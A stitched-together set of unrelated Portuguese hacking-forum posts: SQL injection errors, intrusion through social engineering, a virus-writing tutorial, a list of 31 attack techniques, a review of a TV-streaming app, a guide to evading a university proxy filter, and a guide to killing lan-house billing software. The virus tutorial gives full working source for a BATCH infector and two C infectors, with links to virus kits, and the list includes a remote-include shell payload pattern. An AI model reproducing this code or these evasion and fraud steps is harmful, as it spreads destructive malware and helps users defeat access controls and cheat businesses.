Por este motivo quando se busca erro em um site se utiliza ' este caracteres especial provoca um erro no indicador do motor do banco de dados, seria a mesma coisa que você pedir um copo de água em chinês para sua irmã mais nova, com certeza ela não iria saber o que você quer e iria indicar que não entendeu nadinha do que você falou, neste ponto você sabe que pode perguntar ao indicador do motor do banco de dados em formas de erros, neste caso se revela o que é SQL Injection, linguagem de erros do SQL, nada mais que isto, SQL responde tudo o que você perguntar, seja na forma de erros ou com dados verdadeiros ou falsos, as três formas são respondidas.


Para terminar, entenda uma coisa muito importante, SQL server fala inglês e você português, procure falar a língua dele, e lembre-se o SQL comandos deu origem os demais banco de dados, MySQL entre outros.






*** Servidor ou pc
invadir um servidor é tarefa simples ou complicada, tudo depende do operador, mas uma coisa é certa, você está fazendo defaces ou invasões de uma ou outra, mas o importante e você entender, não a invasão sem permissão nestes casos, um jogo de gato e rato, obter dados e coloca-los em seu laboratório para se obter um resultado, para se invadir um servidor você deve ter:


Ser um gênio em Engenharia social.
Conhecimento médio em usar um computador, nível curioso avançado.
E não ser uma pessoa preocupada, encanada com IP, segurança estas coisas.
Ter um objetivo.
E saber que em termos de administradores de servidores, não a distraídos.



Sabendo disto e obtendo estas características de hacker, você tem grande possibilidade de diferenciar uma invasão de uma indicação de invasão, bem diferente uma da outra, a primeira:

Invasão é você criar seus próprios caminhos em uma maquina em dias ou em anos.

Indicação de invasão é receber dicas, instruções de caminhos a tomar, como informações pessoas entre outras, isto não é invasão e muito menos obter conhecimento, é ser homem de vidro, homem de vidro é aquele que se perde ao ter que tomar caminhos por contra própria.


Invasão:

Uma boa invasão sempre comesa com uma boa engenharia social, nunca ela começa em dicas, conhecimentos de programação, sabemos que qualquer OS segue esta regra:

Navegador
Janelas
Clique
Ação

Tudo isto se repete inúmeras vezes, porem o que você estala em seu pc podem conter erros de programação ou descuidos que levam seu firewall reconhecer um invasor como o seu soft preferido, este é o grande segredo de uma boa invasão, o que ele tem instalado e o que eu posso usar como uma porta permanente de acesso a maquina, ou será que posso criar uma com engenharia social, seria muito mais fácil se tormar amigo da vitima do que ser aquele hacker chato que em 2 em 2 minutos seu firewal o alerta que o hacker camelo está de volta, neste ponto a vitima já começa a debochar do hacker curioso, ?coitado a se eu tivesse o mail dele? coisas assim magoa o hacker, mais se magoar faz parte, o importante é ser amigo, ser hacker é conhecer a vitima e não saber como programar um enorme script que de permissão a maquina, seria muito mais fácil ser amigo, e ser hacker é ser amigo, grandes empresas são atacadas por imprudências de programadores e funcionários internos, em outras palavras todo mundo acredita e duvida do que lê, mas o que faz a diferença é quem e por que escreveu tudo isto.

Saber usar o que você conhece ajuda em determinados assuntos, mais em casos de invasão de servidor ou pc nada mais funcional que engenharia social, e não é perguntando a senha de um administrador ou usuário que vc vai hackear alguém, e sim sendo atento aos detalhes.
Mas se lembre que invadir é matemática seja ela o que for, se você não é bom em matemática, nada da certo, e não estou falando de matemática pura, e sim de matemática simples como a do raciocínio humano, de ação e reação um exemplo, pensar como suas vitimas ajuda em 90%, saber o que fazer é conhecer sua vitima como você mesmo.


Não adianta você usar linhas de comando enormes, sendo que 80% das pessoas que usam a internet usam conexão remota, seja para compartilhar dados ou até mesmo por não saber que este recurso está ativado.

Olá a todos!



Nesse novo tutorial pretendo ensinar um pouco sobre como escrever o seu vírus...
Essa é uma área muito ampla, irei tentar explicar como nascem os vírus. Se haver algum erro, peço que me avise.
Este tutorial é para o publico com noções de programação.


====================================
BATCH vírus, a simplicidade
====================================



Vírus em BATCh estão se tornando incrivelmente comuns hoje em dia, isso por causa de duas reações: 1) Eles são incrivelmente fáceis de escrever e não requerem uma experiência "real" em programação, e 2) Existem um número crescente de programas que convertem arquivos .BAT em .COM e/ou arquivos .EXE.



Isso permite ao arquivo BATCH ficar com forma de arquivo EXE e também de ser editado. O vírus à seguir, não importando o formato, funciona em formato BATCH.



Ele procura em todos os diretórios por arquivos .COM e .EXE, procurando pelo último do diretório. Então ele renomeia o arquivo para o nome do arquivo BATCH com um V no começo, esconde ele, e põem um arquivo BATCH com o mesmo nome dentro do diretório que contém o vírus. O comando usado pode ser facilmente achado em um Guia de Usuário do MS-DOS. para curas-se dele, leia as instruções dentro. O vírus se cura simplesmente editando um arquivo BATCH contaminado. Isto, mostra o fato que ele não é um "arquivo executável", é um vírus, como todos os outros, Pode causar dano se manuseado impropriamente. Ele não vai sair do diretório, a menos que ele seja rodado em outro diretório. Como isso pode ser potencialmente perigoso, seja cuidadoso e use seu bom senso. E se você não entender ele, não teste a sua sorte brincando com ele! Estudo o código e o manual do MS-DOS até que você aprenda bastante sobre ele. Para criar o vírus, simplesmente ponha ele no NotePad, e salve ele como TRIPBR.BAT. Ponha ele em um diretório isolado, então você poderá testa-lo. Denovo, tenha cuidado, ele foi feio para fins educacionais, sendo assim sua a responsabilidade.



Batch Vírus
-------------Codigo----------------
@echo off
ctty nul
rem ______________________________________________________________
rem :BATCH vírus, Criado para fins educacionais!
rem :Este vírus pode ser curado editando "attrib -h -r *.*" nos
rem :diretórios infectados e deletando os arquivos BATCH criados
rem :com o código, renomeie os arquivos que contém "V" no início
rem :para o seu nome original. NOTA: Não infecta o COMMAND.COM.
rem :______________________________________________________________
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
-------Final do código----------------



====================
Vírus em linguagem C
====================



Linguagens mais avançadas, assim como Basic, C, e várias outras, são a razão de muitos programadores passarem dias e dias em casa. Essas linguagens contribuem tendo um monte de funcionalidades, e permite o programados escapar de se chocar com a máquina em que está sendo programado, em vez de se focar no design do programa. Para vírus, isto facilita muito e abrange mais funcionalidades, mas existem vários outros obstáculos. O primeiro é que linguagens mais avançadas não são fáceis de serem compiladas, mesmo em C não é nada fácil. Como resultado disso, muitos vírus deste gênero são primitivos [normalmente é só sobrescrever] em seu sistema de reprodução, e também suas rotinas no disposit´vo são imprevisíveis. Outra desvantagem é que linguagens mais complexas gostam de criar arquivos com MUITO MAIS de 10k e mostram muito mais - não muito eficiente para um vírus. Com esse tamanho todo, o vírus que se aloja na memória irá denunciar sua presença ao usuário pela perda de um monte de memória repentina. Outra possibilidade com linguagens avançadas, do mesmo jeito, é um vírus com source-code. Este tipo de vírus é um pouco raro, mas pode ser muito eficiente. O que um vírus de source-code faz, em uma prévia, é procurar por outros source-codes na mesma linguagem - por exemplo, ele possivelmente procurará por arquivos com extensão ".C" para C. Ele vai por ele mesmo ao código (parecendo seu um jeito de "inclusão" para um leitor com as rotinas e botar um chamado para ele m main()) que irá ser executado após o programa ser compilado. Após a compilação, o vírus será mais ou menos invisível dentro da aplicação, e irá ser dormente até achar outro arquivo ".C". O único caso documentado que eu sei deste tipo foi o vírus de Mark Ludwig apresentado em Computer Virus Developments Quarterly, Volume 1, númerp 2. Sem nenhuma dúvida,todos esses vírus possuem alguns passos básicos em comum. São ele:
1) Achar um arquivo para infectar, seja ele um executável, source,
ou qualquer coisa (se não achar, vai para o passo 3)
2) põem o vírus no arquivo.
3) Decide se alguma ativação de rotina é necessária, se for,
ativa.
4) Retorna ao host ou termina e volta ao DOS.
Para vírus do tipo "overwriting" (sobrescrever), a implementação destes passos são bem simples. O único problema com estes vírus é que eles destroem todos os programas que eles reescrevem, sendo assim um pouco óbvio. O único jeito de curar este vírus é achar todos os arquivos infectado e deletá-los, restaurando eles por backup. O vírus a seguir é um vírus do estilo overwriting escrito em C. Ele irá infectar todos os arquivos .COM dentro do diretório atual, destruindo eles completamente. A cada arquivo que ele irá infectar, irá mostrar
"Infecting [FILENAME]" na tela como um aviso. Se você for compilá-lo, comile e após, use EXE2BIN e verifique o o tamanho resultante. Se não foi igual à 9504 bytes, mude a linha "x=9054;" para o tamanho apropriado. Tenha cuidado com este vírus, por ser um do tipo primitivo, ele vai destruir qualquer .COM que ele pegar.



-----------Corte Aqui-----------------
/* Esse é um vírus simples do estilo overwriting programado em Turbo C */
/* Ele irá infectar todos .COM no diretório atual */
/* Infecção destrói o programa e não pode ser curado */
/* Meramente feito como exemplo para o grupo INVASÃO.com.br */
/* PARA FINS EDUCACIONAIS SOMENTE! */
#include
#include
#include
FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;
main()
{
done = findfirst("*.COM",&ffblk,0); /* Acha um arquivo .COM */
while (!done) /* acha todos COM's no diretorio */
{
printf("Infecting %s\n", ffblk.ff_name); /* informa o usuario */
Virus=fopen(_argv[0],"rb"); /* abre o arquivo infectado */
Host=fopen(ffblk.ff_name,"rb+");
x=9504;





while (x>256)
{
fread(buff,256,1,Virus);
fwrite(buff,256,1,Host);
x-=256;
}
fread(buff,x,1,Virus); /* Final da cópia */
fwrite(buff,x,1,Host);
fcloseall(); /* Fecha o arquivo e */
done = findnext(&ffblk); /* vai para outro. */
}


return (0);
}
------- Corte Aqui ------------


O próximo vírus também é em C, mas é um pouco diferente na sua função do que o último. Invés de infectar arquivos executáveis dando um ?overwriting?, ele infecta arquivos .BAT pelo diretorio. Quando executado, BAT&COM irá procurar um diretório antes do diretorio em que se encontra. Se nenhum for encontrado, ele irá tentar o diretório ROOT, então finalmente o diretório DOS. Se ele char algum arquivo BATCH, ele irá infectar todos os arquivos BATCH no diretório, e depois irá checar se seu arquivo já foi adicionado naquele BATCH. Se não for, ele irá criar um arquivo chamado BATCH&COM contendo o vírus. Na minha instalação, depois de passar o EXE2BIN no arquivo, ele sairá com mais ou menos 10k. O código à seguir:



O vírus BAT&COM em C


-------------Começo do Código----------------
/* Este arquivo é um vírus em linguagem alta de um tipo diferente.
Ele irá procurar por arquivos BATCH, quando encontrar, copiará
uma cópia do vírus na pasta em que encontrou o BATCH, e escreverá instruções no BATCH para executar o vírus. Cuidado! Somenete para estudos!!
Grupo INVASÃO.com.br
*/
#include
#include
#include
#include
struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir); /* Salva o diretório antigo */
Pick_A_Dir(); /* Acha um novo diretório para */
Infect_Directory(); /* iinfectar e infecta ele. */
chdir(old_dir); /* Retorna para o diretório entigo */
return 0;
}
Pick_A_Dir()
{
int done;
chdir(".."); /* Primeiro, tenta um DIR. */
done=findfirst("*.BAT",&ffblk,0); /* Se não encontrar BATCHs, tenta */
/* o diretório ROOT e DOS. */
if (done)
{
chdir("\\");
done=findfirst("*.BAT",&ffblk,0);
if (done) chdir("\\DOS\\");
}
return 0;
}
Infect_Directory()
{
int done;
done = findfirst("*.BAT",&ffblk,0);
while (!done) /* Acha todos .BAT */
{ /* e adiciona o código para executar*/
Do_Batch(); /* o BAT&COM se não */
done = findnext(&ffblk); /* estiver o camando lá. */
}
if (findfirst("BAT&COM.COM",&ffblk,0)) /* Se o BAT&COM */
{Copy_Virus();} /* não existir, então */
return 0; /* copia ele para a pasta.*/
}
Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];
Get_Path(vpath); /* Localiza a pasta para dicioná-la */
/* no comando do BATCH */
if (vpath[3]==0) vpath[2]=0;
batch=fopen(ffblk.ff_name, "rt+");
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0; /* Termina a String */
if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Checa se */
{ /* o batch está */
fseek(batch, 0, SEEK_END); /* infectado. */
fprintf(batch,"\n%s\\BAT&COM.COM",vpath);
} /* Adiciona comando */
/* para o batch */
fclose(batch);
return 0;
}
Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024]; /* Copia o vírus para */
/* o novo diretório */
old_virus=fopen(_argv[0],"rb");
new_virus=fopen("BAT&COM.COM","wb");
write_length=1024;
while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}
Get_Path(char *path)
{
strcpy(path, "A:\\");
path[0] ='A' + getdisk(); /* Retorna para o endereço local*/
getcurdir(0, path+3);
return 0;
}
------Final do Código-----------



====================================
Ferramentas de Criação de Vírus
====================================



Pessoal se vocês quiserem ferramentas que lhes ajudam na criação de seus vírus ai vai uma lista. Não custa lembrar-lhes para terem cuidado ao maneja-los, e, criar seus próprios vírus é bem melhor!



http:\\vx.netlux.org/vx.php?id=ts03 <= Ferramenta para criação de vírus em BATCH
http:\\vx.netlux.org/lib/static/vdat/creatrs1.htm <=Site com uma lista de Vírus Kits
http:\\home.snafu.de/madokan/mvic/viruscont.html <=Outra lista imperdível



Espero que gostem!!



Dúvidas e sugestões? Poste aqui!



[]'s!

Alguns métodos de ataques digitais
by Sthealt

1. Vírus
Geralmente os vírus tem extenções como .exe, .com, .sys, .bin, .drv, .src. Quando executados, eles infectam outros arquivos, como .exe, .com e outros. Para não serem exterminados, eles podem se criptografar, fazer poliformismo (a cada infecção o vírus muda de caracteristica) entre outras, aposto que muita gente já teve trabalho com vírus, e mesmo tendo um bom anti-vírus é possivel acabar com um no final.

2. Botnets
Os botnets não são considerados vírus, pois não infectam arquivos. Um botnet é meio parecido com os worms, podendo se propagar por spam e falhas. Quando se está infectado, o atacante permite inserir comandos via IRC(Internet Relay Chat) ou mIRC, o botnet fica conectado ao servidor. O atacante se conecta no mesmo canal e servidor, e lança os comandos para o botnet.
A remoção de botnets é geralmente simples, pois, como foi dito no inicio, eles não infectam arquivos.

3. Worms
Diferente dos vírus os worms não precisam infectar arquivos para se espalhar, eles usam serviços da rede, como o e-mail, se anexando em programas P2P (Kazaa, e-Mule e outros), e geralmente possuem extenções .vbs (VBScript ou Visual Basics Script), com está extenção, é possivel até ler o código do worm, pois ele não precisa estra compilado (transformado em linguagem de máquina).

4. BadComs
BadComs são pequenos programas em lote usados pelo MS-DOS, mas ao invez de executar uma tarefa de optimização, ele usa comandos destrutivos, como del, e outros. Existem programas que fazem o código dele .bat (visivel) fica .com, ou seja, compilado (código quase invisivel). Na maioria das vezes, nenhum anti-vírus o detecta.

5. Cavalos-de-Tróia
Muitos já devem ter ouvido a história "os gregos contra os troianos, os gregos não conseguiam passar da muralha dos troianos, então os gregos mandaram muitos soldados dentro de um cavalo gigante de madeira, como pedido de desculpas, quando os troianos dormirão, os soldados sairam e conquisatam tróia", um cavalo-de-tróia (ou trojan) não ataca de modo diferente, ele se baseia na conexão cliente-servidor onde o cliente é o hacker eo servidor é a vitima infectada, o servidor de um cavalo-de-tróia é o programa que vai contaminar o computador e abrir uma porta para o hacker se conectar a vitima, o hacker abre o cliente, e se conecta e ai ele pode deletar arquivos, abrir um chat, capturar teclas (como um keylogger) entre outras, geralmente as pessoas que criam os trojans fazem uma espécie de camuflagem, eles colocão joguinhos ou algo assim.
O método de invasão por cavalo-de-tróia é um dos métodos mais usados para a invasão na Internet.

6. Keyloggers
Os keyloogers gravam tudo o que é digitado no computador e os enviam para o hacker (geralmente por e-mail). Os keyloogers de inicio foram feitos para os pais monitorassem o que os filhos faziam na Internet, mas foram evoluindo e se tornando ferramentas hackers muito úteis, por exemplo, você todos os dias acessa o seu e-mail, o hacker pega um keylooger e manda para você, quando você for digitar sua senha e seu e-mail, o keylooger vai estar monitorando as teclas e mandando para você. Mas vale lembrar que os keyloogers não gravam somente senhas, eles gravam tudo e mandam.

7. Screenloggers
Este é muito parecido com o keylogger, mas tem uma diferença, ele não grava teclas, grava imagens do computador, por que, com a invenção do teclado virtual (no Windows XP é só ir em Inciar, Executar, osk.exe) alguns keyloggers deixaram de funçionar, para você ter uma ideia, tecle a tecla ?Print Screen?, va no paint (ou qualquer outro editor de imagens) e digite Ctrl+V, pois é mais ou menos assim que o screenlogger funciona, só que ele manda pro hacker.

8. Brutal Force
O conceito de brutal force é de descobrir uma senha na tentaiva e erro, ele só optmiza a tarefa de tentar uma senha depois outra. Por exemplo, você pega o programa brutal force abre a sua lista de senhas e usernames o poem para atacar, ele vai tentar todas as senhas e usernames da lista até achar alguma senha. Esta técnica deixa muitos rastros e é preciso de uma boa wordlist (lista de palavras) para descobrir uma senha.

9. Fake Mail
Fake mail é mandar uma mensagem com um o seu endereço de e-mail falsificado, por exemplo, você quer mandar uma mensagem a seu amigo com o e-mail de fulano@prov.com você entra no telnet abre o servidor SMTP (não precisa login) pelo telnet, digita os comandos e envia. Mas, alguns servidores restringem mandar e-mails sem logar ou então bloqueiam acessa-los pela linha de comando.

10. Phising Scam
É o ato de flasificar uma página. Por exemplo: você abre a página do Yahoo! pelo seu browser, clica em Arquivo, Salvar Como..., escolha uma pasta e salve está página, depois a abra novamente, viu? Digitando mais alguns comandos extras na página HTML, é possivel fazer com que a página que você logou envie o que estava escrito no formulário para seu e-mail.

11. Pharming
No pharming você falsifica nomes DNS para redirecionarem para outra página (por exemplo, a sua página com Phising Scam), funciona da seguinte manira: antes do browser traduzir os nomes DNS, ele procura em uma lista onde já contem alguns (no Windows C:\WINDOWS\system32\drivers\etc\hosts, e no Linux /etc/hosts), nela estão contidos os textos da seguinte maneira:
IP DNS
Imagine se você colocar o IP do Google e o nome DNS do Terra? Pense um pouco...

12. Compartilhamento
Sem dúvida um dos métodos mais fáceis de invasão de Windows... Por exemplo, no Windows existe um compartilhamento que se você ativar, sua unidade C: (ou outra) fica aberta para toda a Internet (sem senha até), podendo deletar, copiar coisas, apenas digitando em um browser (ou no Executar do Windows) \\IP, existem até scanners de compartilhamentos.
No Windows 9x, existe uma falha que se você souber a primeira letra da senha, você já abre o compartilhamento.
Mas também é obvio que o compartilhamento pode ser configurado com mais segurança.

13. Man-In-The-Midlle
Traduzindo para o português, ficaria como home no meio. Uma conexão funciona assim:
[cliente]-----------canal critpografado------[banco de dados/servidor]
O cliente envia pedidos em um canal criptografado para o bando de dados ou servidor, e a técnica man-in-the-midlle funciona assim:
[cliente]?canal criptografado---[hacker]---canal criptografado---[banco de dados/servidor]
Podendo assim, o hacker ver tudo o que o cliente enviou, inclusive senhas, por isto está técnica se chama man-in-the-midlle.

14. Sniffers
Usar sniffers é como ?farejar? o tráfego de uma rede ou computador.
Neste tráfego, vão senhas, vem senhas, e todo o resto do tráfego da rede. Imagine um sniffer em um roteador (todo o tráfego passa por ele, pois ele é quem vai redirecionar os pacotes para o computador certo), todo o tráfego da rede iria passar por lá e você iria saber.

15. Exploits
Exploits são uma mão-na-roda, os exploits exploram vulnerabilidades em scripts, servidores, computadores, geralmente são feitos em C++ ou Perl e quase que sempre, para Linux ou Unix. Existem dois tipos de exploits, os locais e remotos.
Os locais geralmente são feitos para Linux/Unix para conseguir acesso de Root (administrador), e remotos podem ser executados a longa distancia, você está no seu sistema operacional e executa o exploit em algum host remoto. Existem diversos exploits para diversas vulnerábilidades, basta procurar.

16. Scanners de portas
Os scanners de portas, como no seu nome escaneiam portas de comunicação, por exemplo: eu quero ver as portas do host tal, você abre o port scan e pede para ele escanear as portas. Ele mais ou menos optimiza a tarefa de tentar um telnet em todas as portas.

17. Scanners de falhas
Estes escaneiam falhas em hosts em busca de scripts vulneráveis. Este tipo de escanner é excelente para se descobrir uma vulnerabilidade e depois usar o exploit.

18. Injections
Como o próprio nome diz, é o ato de injetar códigos em alguma coisa. Existem três tipos de injections mais conhecidos, o PHP Injection, SQL Injection e o JavaScript Injection.
No PHP Injection, é possivel injetar códigos shell no servidor remoto, ele funciona procurando aqueles tipos de páginas como index.php?main=http://www.site.com.br/main.html, ele troca onde está escrito está espécie de link por uma CMD (com ela é que você vai injetar os comandos), que geralmente são GIFs ou JPGs, exemplo: index.php?centro=http://url da cmd/cmd.gif?&cmd=comando
Não é preciso programas especiais para criar uma CMD (apenas um pouco de conheçimento em PHP), se você procurar no Google, vai achar boas coisas.
Agora já a SQL Injection permite você injetar comandos no banco de dados, podendo assim descobrir senhas e nomes de usuarios, pode ser inserido em URLs ou em formulários de logins, para se injetar comandos pela URL é necessário saber um pouco de SQL, bom para injetar em formularios tambem, mas em formulários é mais fácil.
E no JavaScript Injection, você injecta comandos JavaScript na página, por exemplo, você abre uma página qualquer e digita no browser javascript:comando javascript, pense no que pode se conseguir com isso? Podemos saber a sessão do cookie, injetar nos campos hiddens de formulários para alterar preços, fazer muitos truques no Orkut é só saber JavaScript.

19. DoS e DDoS
Com o DoS (Denial of Service ou Negação de Serviço) você não invade o host, mas pode fazer uma bela baunça, o conçeito de DoS é de que você vai enviar resquisições negando alguma coisa, o computador não vai conseguir responder a tantas requisições e então ela se disconecta. E DdoS (Distirbuted Denial of Service) é como um super-DoS, onde várias pessoas se reunem para atacar um servidor, onde uma só pessoa não va fazer diferença.
No DDoS existem classificações, e essas são:
atacante --> quem lidera o ataque
master --> comanda os agentes e recebe instruções para o ataque
agente --> a máquina que inicia o ataque as vítimas
cliente --> aplicação instalada no master que envia os comandos ao daemon
daemon --> aplicação instalado no agente que recebe e envia os comandos enviados pelo cliente
vitima --> a pessoa azarada que vai ser o alvo
O maior recorde de DDoS foi quando hackers do mundo todo atacaram o Google! E é claro, ele saiu fora do ar. Este é o conceito bem básico de DoS e DDoS, mais informações, consulte o Google.

20. WarDialing
Traduzindo para o português ficaria Discagem de Guerra, este ataque escaneia vários telefones em busca de resposta de um modem, se algum modem responder, ela talvez possa ser usada para acessar a Internet. Pena, que pra quem sua discada vai ser horrivel pagar os pulsos.

21. IP Spoofing
O conceito básico de IP Spoofing é fingir que você tem um IP que você não possui, por exemplo:
A maquina ?A? só pode se comunicar com ?B? e ?B? com ?A?, o que você procura, está na máquina ?B?, mas ela só aceita pacotes da máquina ?A?, então, você tira ela do ar e usa um IP Spoof para fingir que você é a maquina ?A? ai vocês podem se comunicar.

22. Engenharia Social
Muito usada para conseguir senhas e informações, essa técnica NÃO depende do computador, está é a arte de enganar, por exemplo, mandar um fake mail dizendo que é técnico da Yahoo! pedindo a confirmação da senha, invente alguma desculpa.

23. Whois
Pode ser muito útil para conseguir informações, quando se faz um whois, é fornecida várias informações sobre em que nome está o dominio, telefone, rua, endereço e muitas outras coisas, você pode pegar fazer whois pelo site http://registro.br ou http://www.internic.org.

24. RootKits
RootKits são programas muito parecidos com backdoors e trojans, mas o seu sistema de ocultamento o separa. Quase todos feitos para Linux, ele pode mudar comandos como netstat e outros sobre informações de serviços ou processos para que o rootkit fique oculto. Se você conseguiu root em algum host, e instalar o rootkit, na proxima vez que você se conectar, vai estar como root de novo.
Se você foi infectado por um, é recomendado formatar o computador.

25. Buffer Overlow
É a técnica de estouro de pilha, pilha do que? Da memória, ou seja, ele vai inundar a memória, nessa inundação, você pode fazer com que o exploit que fez o buffer overlow execute uma shell e envie para você, com o Netcat ligado, você pode receber a shell. Seria como colocar 500ml em um copo de 200ml, teria uma inundação, e nos computadores não é diferente. Exemplo de programa vulnerável a Buffer Overlow:
Código:
/* Programa vulnerável ao buffer overflow
por Rodrigo Souza Delphino
e modificado por Sthealt
linguagem C++*/

#include
int main()
{
char nome[15];
printf("Digite seu nome: ");
gets(nome);

printf("seja bem vindo %s", nome);
}

Note que a uma variavel que suporta somente 15 digitos, se colocarmos mais que isso, haveria um transbordamento da variavel.

26. Dissasembler
Um cracker (como um hacker que quebra direitos autorais etc) com um dissasembler, pode fazer quebrar várias travas de programas, bem como sharewares.
Um dissasembler funciona assim: você escreve um programa, para os computadores intenderem ele precisa estar em linguagem de máquina, então é feita a compilação (transformação de linguagem de programação para linguagem de máquina). Um dissasembler transforma o arquivo compilado (normalmente .exe) para Assembly, que é a mais perto de linguagem de máquina, podendo assim, ler linhas do código sabendo assembly.

27. Backdoor
Backdoors evitam a conexão com os modos de autenticações normais, ele abre uma ?porta dos fundos? para você se conectar, quando você está conectado ele lhe da o shell do sistema (interpretador de comandos padrão).

28. Spywares
Estes podem coletar e enviar informações de você, como o cookie, browser, até mesmo senhas em casos mais malignos. Pode ser removido com um bom Anti-Spyware.

29. Joiners/Binders
Estes podem ser muito util para deixar malwares (virus, trojans, etc) indetectaveis, eles unem 2 arquivos em um só. O problema é que as vezes pode dar um comflito e não funcionar nenhum dos dois. Você pode unir uma foto e um trojan.

30. Compressores
Não estou falando de programas como WinZip, WinRAR etc, estes comprimem diretamente no executável, também podem deixar arquivos indetectaveis, ele dimuniu o tamanho dos arquivos, com isto pode se deixar malwares indetectaveis.

31. Google Hacking
O Google com certeza é o jeito mais fácil, para achar quanto para explorar falhas. No Google não é só colocar simples palavras para pesquisar, pode se colocar comandos especiais. Imagine se você colocasse o comando certo para achar a falha certa, pode ser um scan especifico ou a vários servidores. Existem até programas para se explorar falhas usando o Google.

Então...
Vimos vários meios de ataques digitais, para ser específico 31, é claro que não é só esses meios de invasão que existem, a muuuito mais, que existem e que serão descobertas.

Ultimamente tenho separado um tempo para ver algumas novidades na internet que possam chamar a atenção, ou que sejam ao menos interessantes de se acompanhar, e por conta disso, recentemente recebi um artigo sobre uma empresa que está disponibilizando o conteúdo de TVs através da internet, utilizando protocolo próprio p2p, é a tvunetworks.

http://tvunetworks.com/

A princípio, me pareceu estranho esta empresa... sediada na China, poucas informações no site, aplicativo em beta, disponibilizando VÁRIOS canais da TV Americana (como ESPN, CNN, FOX, etc)... realmente parecia ser algo "não 100% correto". Como eu estava cabreiro, comecei a pesquisar o assunto, e realmente existem vários artigos sobre eles, inclusive alguns especulando sobre seus executivos, especulando o seu propósito, porque foi aberta "na China" e não nos EUA, etc., mas lendo com cuidado, realmente parece ser uma jogada "interessante", e não tem porque não ser "correta" (pelo menos em tese). Como o conteúdo é 100% o da TV, o aplicativo na realidade só está alterando o "MEIO DE TRANSMISSÃO", e não o conteúdo, ou seja, os canais de TV, são mostrados idênticos ao que é passado na TV, com seus anúncios, propagandas, merchandising, etc., só que ao invés de ver na TV, é visto pela internet. Só quem estaria "perdendo", seria o "provedor" da conexão a cabo, e não as empresas de TV.

Não sei no que isso vai dar, mas é acompanhar para ver, ainda mais que para os conglomerados de TV, a opção é interessante pois MAIS GENTE IRÁ VER SEUS PROGRAMAS, portanto, estes (que são os fornecedores do conteúdo), não tem do que reclamar.

Tirando este aspecto de direitos autorais, etc., de lado, é interessante ver o aplicativo em funcionamento. Na minha conexão de banda larga de 1MB pelo Velox, o vídeo aparece muito bem, sem interrupções, sem problemas de conexão, etc. Ao selecionar um canal ele leva um tempinho para equalizar a velocidade, carregar os buffers, etc., mas depois fica perfeito (testei com uns 5 canais hoje)!

O aplicativo ainda está começando na internet, mas aparenta ser interessante ainda mais porque eles também fornecem uma opção de você realizar o broadcast de conteúdo, ou seja, você pode realizar o download tanto do visualizador como do gerador de conteúdo de tv.

Para já, vou mostrar aqui como instalar o visualizador, e para quem não tem TV a cabo e quer acompanhar alguns canais interessantes (esportes, notícias, etc) no original, já pode ir se divertindo!

Para baixar o "player", vá na página da TVUNETWORK, e clique em download ou em "For TV Viewers":

Na página de download, clique para baixar o visualizador:

ltimate Tutorial - Como entrar em sites que universidades e escolas não permitem.

Bem, numa rede escolar ou universitária, geralmente vc precisa da sua matrícula para entrar na rede. Geralmente a rede é formada de computadores com Windows XP e vc tem permissões minímas.

Bem, na rede da minha Universidade (e creio que na maioria tbm é assim), todo pacote HTTP passa antes por um proxy que verifica se o pacote contem alguma palavra proibída (tipo proxy, Orkut, fotolog.net, enfim)... então a URL www.fotolog.net não entra, nem a pesquisa do google por orkut, por ter a palvra proibída na URL.

Então pensei em colocar o IP do site que quero, pq aí não teria a palvra proibída...

Fui no DOS e digitei tracert www.fotolog.net

Aí achei o IP e tentei... mas vi que não dava tbm...

Então eu pensei no seguinte, fazer os pacotes não passarem pelo Proxy da Universidade...

Aí tentei colocar um endereço proxy mas eu não tinha acesso a Opções da Internet.

Aí que me veio a luz. O Windows tranca essa opção no IE pq eu não tenho acesso de administrador... Mas ele não pode trancar por exemplo no Firefox...

Aì fui tentar instalar o FireFox mas não tinha permissão de instalação deste programa no Arquivo de Programas da unidade C:/

Então lembrei que quando vc entra numa rede tipo de colégio, vc tem um espaço para vc, que é geralmente o F:suamatricula e que nesse espeço vc tem permissão completa.

Então baixei o Firefox e instalei no meu espaço... mas agora vinha um problema, como eu iria achar um endereço proxy se proxy é uma das palvras proibídas??????

Simples, usei o site http://www.browseany.com para acessar o site http://www.publicproxyservers.com/index.html e usei um proxy deles...

Porém aí eu notei uma coisa... se eu usasse um proxy que acessasse pela porta 80, tbm bloqueava as palavras proibídas... Então usei um Proxy que não acessasse a porta 80 e voilá...

é bastante parecido com HTTP Tunneling né?!?! pq isso na verdade faz as requisitações de HTTP passarem por uma porta diferente...

Bem, é isso aew...

Olá!!


Como já diz o título, tentarei explicar um método para você passar por cima do sistema de tipo CADASTRO, onde você paga pelo tempo e o programa que controla seu tempo acaba com sua diversão no final Wink


===============
Process Explorer
===============


Simples:


- Baiche o Process Explorer do site www.snapfiles.com/get/processexplorer.html e inicie na máquina da lanhouse (não é necessário a instalação).


- Após o Process Explorer começar, procure pelo processo do software que acaba com sua diverção, normalmente está tarjado com uma cor roxa.


- Se haver mais de um processo em roxo, selecione o primeiro da three (árvore).


- Após selecionado clique com o botão direito e selecione KILL PROCESS ou PAUSE PROCESS.


=================
Ação e reação
=================


- Alguns softwares de lans possuem um sistema se segurança que quando o processo for finalizado, ele trancará o computador.


- Use a lanhouse em dias movimentados, pois o administrador (se não for burro) pode notar que tem um computador sendo usado mas no cliente do software mostra ele como livre...


- Use PAUSE PROCESS para garantir que não vai haver os erros acima mensionado.


- Ah sim! Seja discreto... não saia contando para todo mundo que você sabe como ir na lan de graça! O administrador pode notar e cortar o barato de poder localizar processos no computador. Ai eu lhes digo uma coisa: se ferro!



Té a próxima!

Galera, este é um tutorial simples do que pode ser feito para aumentar a velocidade do Firefox.

